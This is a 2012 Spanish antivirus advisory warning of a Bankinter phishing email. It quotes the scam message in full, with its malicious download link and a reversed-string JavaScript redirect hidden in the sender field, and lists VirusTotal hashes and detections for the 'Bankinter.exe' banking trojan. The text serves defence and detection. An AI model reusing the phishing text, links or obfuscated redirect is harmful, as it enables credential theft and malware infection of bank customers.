Nuevo “phishing” de BANKINTER

Un nuevo mail se está enviando masivamente aparentando ser de BANKINTER:

Mail malicioso:
_______________________
——– Mensaje original ——– Asunto:  Sistema de Seguridad BANKINTER.
Fecha:  Wed, 7 Mar 2012 08:50:39 +0100
De:  <$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:virus@satinfo.es”>virus@satinfo.es>
https://www.bankinter.com/www/cacheables/img/bankinter.v1.cache.gif
BankInter siempre trata de encontrar sus expectativas mas altas.
Por eso usamos la ultima tecnología en seguridad para nuestros clientes.
Por lo tanto nuestro departamento de anti fraude ha desarrollado un nuevo sistema de seguridad que elimine cualquier posibilidad del acceso de la tercera persona a sus datos, cuentas ni fondos.
Es obligatorio para todos los clientes usar este sistema de seguridad.

Para comenzar la descarga por favor pinche aquí: ACEPTAR  -> link malicoso a http://www.konigimoveis.com.br/<interceptado> <(de Brasil)

Nuestro consejo para usted es que introduzca sus datos se acceso para pasar La Verificación Del Sistema. Si la instalación no es realizado dentro de 48 Horas su cuenta sera suspendida temporalmente hasta que su registro sea completado.
Esto solo le va a costar unos minutos de su tiempo y va a tener una seguridad mucho mas estable.

© BankInter.Todos los Derechos Reservados.

______________________
fin del mail malicioso

Dicho mail adjunta un enlace en ACEPTAR que descarga de una web del Brasil un malware, que pasamos a controlar como PHISHING  BANKINTER  a partir del ELISTARA 25.05 de hoy

El preanalisis de virustotal ofrece este informe:

SHA256: 51101be50935e255d5afe10737d91ae05aeeb8f325007b93adcd7b482aea1f53
SHA1: 41fcb8a246ed6b4cfbe33257fe91831178262c98
MD5: 567c87ea465250e3df2a7d3ef1d5bcac
Tamaño: 981.0 KB ( 1004544 bytes )
Nombre: Bankinter.exe
Tipo: Win32 EXE
Detecciones: 15 / 43
Fecha de análisis: 2012-03-08 11:44:47 UTC ( hace 1 minuto )

01
Antivirus Resultado Actualización
AhnLab-V3 Trojan/Win32.Banker 20120308
AntiVir – 20120308
Antiy-AVL – 20120305
Avast – 20120308
AVG – 20120308
BitDefender Gen:Variant.Graftor.16920 20120308
ByteHero – 20120305
CAT-QuickHeal – 20120308
ClamAV – 20120308
Commtouch – 20120308
Comodo – 20120307
DrWeb Trojan.PWS.Banker1.731 20120308
Emsisoft Trojan-PWS.Win32.Delf!IK 20120308
eSafe – 20120308
eTrust-Vet – 20120308
F-Prot – 20120308
F-Secure Gen:Variant.Graftor.16920 20120308
Fortinet – 20120305
GData Gen:Variant.Graftor.16920 20120308
Ikarus Trojan-PWS.Win32.Delf 20120308
Jiangmin Trojan/Generic.rzlz 20120301
K7AntiVirus – 20120307
Kaspersky Trojan-Banker.Win32.Banz.kie 20120308
McAfee PWS-Banker!hcb 20120308
McAfee-GW-Edition Artemis!567C87EA4652 20120308
Microsoft – 20120308
NOD32 a variant of Win32/Spy.Banker.UCO 20120308
Norman Delf.FIFD 20120304
nProtect – 20120308
Panda Trj/Banker.KHS 20120308
PCTools – 20120228
Prevx – 20120308
Rising – 20120308
Sophos – 20120308
SUPERAntiSpyware – 20120308
Symantec – 20120308
TheHacker – 20120308
TrendMicro – 20120308
TrendMicro-HouseCall – 20120308
VBA32 – 20120307
VIPRE Trojan.Win32.Generic!BT 20120308
ViRobot – 20120308
VirusBuster – 20120308

Dicha version del ELISTARA 25.05 que lo detecta y elimina estará disponible en nuestra web a partir de las 19 h CEST de hoy

saludos

ms, 8-3-2012